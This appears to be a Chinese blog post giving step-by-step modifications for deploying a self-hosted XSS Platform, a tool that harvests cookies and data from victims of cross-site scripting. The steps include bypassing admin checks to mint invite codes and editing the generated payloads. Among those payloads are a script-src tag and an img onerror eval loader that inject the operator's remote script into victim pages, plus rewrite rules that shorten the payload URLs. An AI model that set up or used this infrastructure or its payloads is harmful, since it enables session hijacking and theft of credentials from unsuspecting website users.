需要修改的地方比较多,目前已基本可用,还在学习摸索中。。。
1、将xssplatform.sql中的xsser.me/修改为实际使用的URL,如localhost:6666/xss/
或者导入以后,再进入数据库执行语句修改域名为自己的。 UPDATE oc_module SET code=REPLACE(code,’http://xsser.me’,’http://yourdomain/xss’)
2、修改themes\default\templates\register.html中的提交按钮的源码为:
行53<input id="btnRegister" type="button" onclick="Register()" value="提交注册" />修改为<input id="btnRegister" type="submit" value="提交注册" />3、邀请码的生成(1)将文件source\user.php第10行和50行的权限控制注释掉//if($user->userId<=0) ShowError(‘未登录或已超时’,$url[‘login’],’重新登录’);//if($user->adminLevel<=0) ShowError(‘没有操作权限’,URL_ROOT.’/index.php?do=user&act=invite’);然后访问/index.php?do=user&act=invite即可生成验证码(2)注册个用户test,进入数据库,将该用户的adminLevel修改为1,然后去掉(1)中添加到注释;并在第15行case ‘invite’:处添加权限控制:if($user->adminLevel<=0) ShowError(‘没有操作权限’,URL_ROOT.’/index.php’);(3)或者开放普通注册权限,修改文件/config.php的第18行$config[‘register’]=’invite’;//normal,正常;invite,只允许邀请注册;close,关闭注册功能4、删除cookie修改文件themes\default\templates\project_view.html中的Delete()和MultiDelete()函数,将其中post的URL修改为’/xss/index.php?do=project&act=delcontent&r=’,即根据实际的服务器路径,在前面添加’/xss’5、参考修改文件source\class\user.class.php行 74$this->db->Execute("UPDATE ".$this->tbUser." SET loginTime=’".time()."’");修改为$this->db->Execute("UPDATE ".$this->tbUser." SET loginTime=’".time()."’ where id={$row[‘id’]}");
6、去掉xss URL中的time()动态值,缩短xss URL的长度(不知会不会有啥影响);
去掉使用提示中的</textarea>’\&;>
文件source/project.php中的修改://$codeurl=URL_ROOT."/{$project[urlKey]}?".time();$codeurl=URL_ROOT."/{$project[urlKey]}";//$scriptShow1=StripStr("<textarea>’"<script src=".URL_ROOT."/{$project[urlKey]}?".time()."></script>");$scriptShow1=StripStr("<script src=".URL_ROOT."/{$project[urlKey]}></script>");//$code2=’var b=document.createElement("script");b.src="’.URL_ROOT."/{$project[urlKey]}?".’"+Math.random();(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);’;//$scriptShow2=StripStr("</textarea>’\&;><img src=# id=xssyou style=display:none onerror=eval(unescape(/".rawurlencode($code2)."/.source));//>");$code2=’var b=document.createElement("script");b.src="’.URL_ROOT."/{$project[urlKey]}".’";(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);’;$scriptShow2=StripStr("<img src=# id=xssyou style=display:none onerror=eval(unescape(/".rawurlencode($code2)."/.source));//>");
7、登录页面,回车登录;加载完页面后,自动将光标定位在user输入框
文件themes/default/templates/login.html的修改:<!– <input type="submit" value="登录" onclick="Login()"> –> <input type="submit" value="登录" onclick="Login()">在body的最后添加:<!– 页面加载完成后,将光标定位到user输入框 –><script>document.getElementById(‘user’).focus();</script>
8、修改提示页面跳转时间为500ms
文件themes/default/templates/notice.html:行11setTimeout("location.href='{$notice.turnto}’",3000);修改为setTimeout("location.href='{$notice.turnto}’",500);
10、创建项目页面,,自动将光标置于项目名称处
themes/default/templates/project_create.html行55,添加<script>document.getElementById(‘title’).focus();</script>
11、rewrite规则
在web根目录下建立.htaccess伪静态文件(仅针对Apache)RewriteEngine On RewriteRule ^([0-9a-zA-Z]{6})$ /xss/index.php?do=code&urlKey=$1 [L] RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ /xss/index.php?do=do&auth=$1&domain=$3 [L] RewriteRule ^register/(.*?)$ /xss/index.php?do=register&key=$1 [L] RewriteRule ^register-validate/(.*?)$ /xss/index.php?do=register&act=validate&key=$1 [L]
版权声明:本文为博主原创文章,未经博主允许不得转载。
送给中意的TA,背面写上:某年某月某日,
